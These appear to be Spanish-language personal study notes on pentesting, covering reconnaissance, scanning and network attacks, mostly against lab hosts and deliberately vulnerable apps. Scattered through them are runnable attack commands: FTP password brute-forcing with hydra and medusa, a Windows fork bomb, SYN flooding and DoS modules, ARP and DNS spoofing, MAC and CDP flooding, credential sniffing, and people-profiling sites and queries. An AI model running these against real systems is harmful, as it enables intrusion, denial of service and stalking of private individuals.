Es una técnica que se usa para juntar la máxima cantidad de información posible acerca de un target en específico para aprovechar la parte más vulnerable del sistema para atacar.
Google dork: site google.com -inurl:www
O usando el comando sublist3r en kali: sublist3r -d google.com
Podemos usar https://opencorporates.com para obtener direcciones, números de teléfonos, correos electrónicos, que tipo de servicios están dando, y demás información. Podemos filtrar por país y por diferentes tipos de información. Podemos usar https://archive.com y google dorks para buscar capturas viejas de la página en búsqueda de alguna información jugosa.
Podemos crear una wordlists (lista de palabras) usando el comando cewl
por ejemplo creamos una wordlists de microsoft.com
cewl -d 5 -m 3 -w wordlists.txt microsoft.com
creará una lista con todas las palabras que están presentes en esa página y lo guardará en el archivo wordlists.txt
-d
: depth
-m
: mínima longitud.
Nos permitirá saber información acerca del dominio, quién lo registro, en el pasado la gente ponía información personal, correo, nro. de teléfono, etc. Hoy en día la mayoría tienen los datos en privado.
Y acá podemos obtener información como direcciones IP, localizaciones de IP, historial de IPs, información del hosting.
Podés mirar el historial de DNS, por si usaba algún DNS dominio viejo.
Complete DNS Dns history - largest archive of dns record - domain history:
https://completedns.com/dns-history/
Reverse IP (mirar otros sitios que usan la misma IP): https://viewdns.info
Vamos a obtener la información de servidores DNS, los diferentes tipos de DNS.
nslookup microsoft.com
ping microsoft.com
nslookup -type=soa microsoft.com
nslookup -query=MX microsoft.com
nslookup -type=ns microsoft.com
dnsenum target.com
para hacerlo todo automático.
Esta página contiene muchas herramientas, como por ejemplo Reverse IP domain check, lo que significa que vamos a buscar que otras páginas están corriendo en el mismo servidor que está hosteado nuestro target.
https://yougetsignal.com -> Reverse IP Domain Check
Remote Address: microsoft.com
Muchas veces pasa que nuestro target es seguro entonces podemos intentar atacar a nuestro target principal accediendo por otras páginas que están en el mismo servidor.
Podemos usar advanced-ip-scanner
o directamente usar nmap para escanear las IPs que están dentro de una LAN.
Buscaremos información sobre hosting, puertos, aplicaciones, servicios que se ejecuten en la red.
hping3 192.168.0.1 --icmp -c 5 # ping
hping3 192.168.0.1 --scan 22,80,443 -S
hping3 192.168.0.1 --scan 1-80 -S
Buscaremos información como subdominios, puertos, whois lookups
Ejemplo:
dmitry -p intranet 192.168.0.1 -o demo.txt
nmap -sS 192.168.0.1
nmap -sS 192.168.0.1/24
T0-T5
(time). T5 es el más rápido.nmap 192.168.0.1 -T 5
Para saber si una computadora o más computadora están “vivas”.
fping -g 192.168.0.1 192.168.0.103
fping -a -g 192.168.100.0/24 2> /dev/null
nmap -sS -O 192.168.100.201
Es nmap con la parte gráfica y escaneos pre-configurados.
Hacemos esto para poder encontrar un exploit.
Podemos usar nmap -O ipaddr
o una herramienta llamada idserve en “Search Query” podemos el dominio o la IP que la podemos extraer haciendo un ping del target que estamos atacando, y nos dará información sobre el servidor.
Que tipo de información podemos colectar usando este método.
Usaremos este comando nmap: nmap -sV -v --script nbstat.nse 192.168.0.13
-sV
: para determinar la versión de los servicios que están corriendo en los puertos abiertos de la IP.
-v
: modo verbose
--script
: Para usar un script específico
Podemos usar una herramienta llamada: superscan
(para escanear computadoras con windows)
https://www.youtube.com/watch?v=iYUzMzYLsWw
Vamos a usar “SolarWinds” it managment tool. https://www.youtube.com/watch?v=qt7XkD2Ly54
Protocolo para sincronizar el tiempo de los dispositivos en una red de computadoras. Su función principal es asegurarse que todos los dispositivos en la red tienen consistentes información del tiempo.
NTP opera intercambiando información de tiempo entre el cliente y los servidores. Usa una arquitectura jerárquica de servidores.
Vamos a usar el comando ntdupdate
que es usado para sincronizar el tiempo del sistema con el servidor NTP.
Ejemplo: ntpdate -q 192.168.0.1
En la salida vemos offset
, es la diferencia entre el tiempo local y el tiempo del servidor, delay
es la latencia del servidor NTP.
Vamos a intentar sincronizar el tiempo con ese servidor usando el siguiente comando:
ntpdate 192.168.0.1
ntpdate -d 192.168.0.1
-d
: debug mode
Nmap contiene un script llamado ntp-info para obtener el tiempo y la configuración de nuestro servidor NTP.
nmap -sU -p 123 --script ntp-info 192.168.0.1
nikto -host 192.168.0.10
Vamos a usar lynis
diseñado para buscar vulnerabilidades en sistemas basados en unix y linux.
lynis audit system
hydra -t 5 -V -f -l bee -P password.txt 192.168.0.10 ftp
-l
: username
forkbomb.bat
%0|%0
Viejo método para bruteforcear contraseñas de usuarios de Windows
Una herramienta para copiar la información sin necesidad de utilizar ninguna contraseña, me parece que hay mejores alternativas. Genera una iso de un so para obtener contraseñas de windows?
Navegá a través de internet bajo tor usando iptables.
https://vpnbook.com/freevpn
sudo openvpn vpnbook-us1-tcp443.ovpn
wireshark
ettercap -T | grep password
XDDD
Los paquetes serán enviados usando diferentes direcciones de mac.
macof -i eth0 -n 100
yersinia -G
Lauch attack -> Floding CDP table -> flooding CDP table
:
List attack -> stop attack
yersinia -G
Lauch attack -> sending DISCOVER packet
Abrí wireshark y accedé a tu interfaz de red, en la mayoría de los casos es eth0 si usas cable y wlan0 si estás conectado por wifi y verás los paquetes de dhcp que se están mandando a la red.
dnschef --fakeip=192.168.0.4 --fakedomains=microsoft.com --interface=0.0.0.0
Tenés que hacer que la víctima use el dns 192.168.0.5
Si ejecutamos nslookup microsoft.com
notaremos que la IP del servidor es 192.168.0.5
.
El primer método es evitar usar protocolos inseguros como ftp y http, en cambio usar https y sftp.
En windows podemos usar xarp
.
En linux con nmap: nmap --script=sniffer-detect 192.168.0.5
En los resultados dice: Likely in promiscuous mode.
Creación de emails engañosos para llevar al usuario a páginas maliciosas. Hay muchos tipos de usuarios atacados por ingeniería social como: recepcionistas, IT helpdesk, HR Dept, Top Mgmt. Agregar video 23.social engineering
hping3 -S 192.168.0.3 -a 192.168.0.5 -p 22 --flood
Otra forma de hacerlo con metasploit
systemctl start postgresql && msfdb init && sudo msfconsole
msf> db_status
msf> use auxiliary/dos/tcp/synflood
msf> set RHOSTS 192.168.0.3
msf> set RPORT 21
msf> set SHOST 192.168.0.10
msf> set TIMEOUT 50000
msf> exploit
Podemos ver los paquetes enviados con wireshark
hping3 -c 100 --icmp 192.168.0.3
ping 192.168.0.3 -t -l 65500
Habilitar la limitación del enrutador Usá reverse proxy.
https://detectportal.firefox.com
firefox -> about:config -> network.captive-portal-service.enabled -> false
Abrí burp suite, dejá la configuración por defecto, andá a la pestaña proxy, intercept -> insercept is off.
Entrá a http://localhost:8080 en el menú dale a CA-certificate , descargalo e importalo en chrome : settings->privacy and security->security->manage certificates->authorities->import->all files->cacert.der
Abrí firefox settings->manual proxy configuration->localhost 8080 -> also use this for https
O en chrome: chromium --proxy-server="http://127.0.0.1:8080"
Ahora dale a forward en el burp suite cada vez que visitás una página
Para captar las cookies usaremos una aplicación extremadamente vulnerable llamada bWAPP.
Abrimos bWAPP en firefox, y el burpsuite podemos ir viendo las consultas (request) que se hacen en siguiente(forward)
Es una aplicacion de mierda de Windows para obtener información sobre el servidor, hay mejores alternativas.
skipfish -o /root/output http://192.168.0.10/bWAPP
te creará un index.html con toda la información sobre posibles vulnerabilidades directorios abiertos en esa ip.
output es una carpeta.
nc -vv asdf.org 80
msf > use auxiliary/scanner/http/http_version
msf > set RHOSTS 192.168.0.10
msf > set THREADS 10
msf > run
msf > use auxiliary/scanner/http/files_dir
msf > show options
msf > set RHOSTS 192.168.0.10
msf > run
Lo mismo con msf > use auxiliary/scanner/http/files_dir
para escanear por métodos disponibles en http (no sirve para nada)
webDAV Protocolo usado para crear y mover documentos en un servidor.
msf > use auxiliary/scanner/http/webdav_scanner
Para descargar la página entera en tu computadora, podemos usar wget curl en linux.
disbuster
medusa -h 192.168.0.10 -u bee -P passwords.txt -M ftp
webcruiser
escaner web de seguridad.
Mecanismos para atraer scriptkiddies y engañarlos: Pentbox tool
metacrawler.com
www.baidu.jp , baidu thailand, egypt…
Mime="html/pdf/doc/ppt/xls/rtf/swf"
rhost:ro.*
rhost:edu.*
rhost:edu.* inurl:ftp
lang=ru/uk/be/en/fr/de
ballistics << lang="uk"
solo busca ballistics en páginas uk
linkfromdomain:
devuelve páginas que están enlazadas a un dominio
contains: FILETYPE
retorna las páginas que CONTIENEN ese tipo de archivo.
Por ejemplo: "SSH password" contains: xls
filetype: FILETYPE
devuelve las páginas que fueron creadas con ese formato en específico
ip:
busca otras paginas en la misma IP.
LOC:
retorna páginas de un específico país o región
Ejemplo:
nslookup microsoft.com
Te dará la IP del dominio y podemos buscar por ip en bing ip: ipaddr
Y sí ejecutamos un nslookup a ese dominio que nos dió bing nos dará la misma IP.
https://msdn.microsoft.com/en-us/library/ff795620
Operadores:
and or - * ""
allintext:
inurl:
allinurl:
intitle:
allintitle:
site:
filetype:
link:
numrange:
daterange:
related:
cache:
info:
Google dorks:
https://www.exploit-db.com/google-hacking-database
Si estás buscando gente podés usar las siguientes páginas:
pipl.com
spokeo.com
peekyou.com
lullar.com
badoo.com
twoo.com
adultfriendfinder.com
nirvam.com
https://pastebin.com
https://tinypaste.com
https://pastie.com
Las consultas se hacen en lenguaje humano: Ejemplo: “people who like solar power research”, “people named Hans who live in Munich, Germany”, “Friends of people who like solar power research”.
People who are not my friend who like [PAGE NAME]
My friend who like [PAGE NAME]
Groups of people who like TOPIC and like [PAGE NAME]
Favorite interests of people who like [PAGE NAME]
Pages liked by people who like [PAGE NAME]
Pages liked by people who like [PAGE NAME] and [PAGE NAME]
Pages liked by PERSON or PAGE
Fans of [PAGE NAME] 1 and [PAGE NAME] 2
People who work at PLACE and like SOMETHING
Favorite interests of people who like [PAGE NAME 1] and [PAGE NAME 2]
Identifica el software que usa una página web.
Busca directorios abiertos:
dirb http://192.168.0.1/dvwa /usr/share/wordlists/dirb
dirbuster
arpspoof -i wlan0 -t 172.16.36.133 172.16.36.2
paros
Escaner de vulnerabilidades.
emailharvester -d gmail.com -e linkedin
emailharvester -d gmail.com -e linkedin
nmap -sS -v -v -Pn
nmap -sS -v -v -Pn -g